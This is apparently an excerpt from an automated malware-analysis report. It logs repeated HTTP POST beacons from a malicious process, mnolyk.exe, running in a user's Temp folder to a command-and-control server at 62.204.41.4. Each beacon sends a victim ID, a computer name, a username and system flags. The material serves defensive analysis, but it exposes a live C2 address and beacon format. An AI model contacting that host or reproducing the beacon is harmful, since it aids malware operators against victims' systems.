                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        32 | 192.168.2.5 | 49722 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:39.327483892 CET | 232 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:39.392071009 CET | 233 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        320 | 192.168.2.5 | 50010 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:15.475260019 CET | 521 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:15.539522886 CET | 521 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        321 | 192.168.2.5 | 50011 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:15.710647106 CET | 522 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:15.775943995 CET | 522 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        322 | 192.168.2.5 | 50012 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:15.955152988 CET | 523 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:16.023773909 CET | 523 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        323 | 192.168.2.5 | 50013 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:16.193100929 CET | 524 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:16.259099960 CET | 524 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        324 | 192.168.2.5 | 50014 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:16.436543941 CET | 525 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:16.505187035 CET | 525 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        325 | 192.168.2.5 | 50015 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:16.703906059 CET | 526 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:16.769123077 CET | 526 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        326 | 192.168.2.5 | 50016 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:16.944190979 CET | 527 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:17.008083105 CET | 527 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        327 | 192.168.2.5 | 50017 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:17.179297924 CET | 528 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:17.245771885 CET | 528 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        328 | 192.168.2.5 | 50018 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:17.421895981 CET | 529 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:17.487003088 CET | 529 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        329 | 192.168.2.5 | 50019 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:17.663562059 CET | 530 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:17.728158951 CET | 530 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        33 | 192.168.2.5 | 49723 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:39.562180042 CET | 233 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:39.626537085 CET | 234 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        330 | 192.168.2.5 | 50020 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:17.901531935 CET | 531 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:17.965811014 CET | 531 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        331 | 192.168.2.5 | 50021 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:18.134392977 CET | 532 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:18.199697971 CET | 532 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        332 | 192.168.2.5 | 50022 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:18.367475033 CET | 533 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:18.430800915 CET | 533 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        333 | 192.168.2.5 | 50023 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:18.602365017 CET | 534 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:18.666377068 CET | 534 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        334 | 192.168.2.5 | 50024 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:18.856589079 CET | 535 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:18.919759035 CET | 535 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        335 | 192.168.2.5 | 50025 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:19.101445913 CET | 536 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:19.167455912 CET | 536 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        336 | 192.168.2.5 | 50026 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:19.334486961 CET | 537 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:19.397778034 CET | 537 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        337 | 192.168.2.5 | 50027 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:19.567096949 CET | 538 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
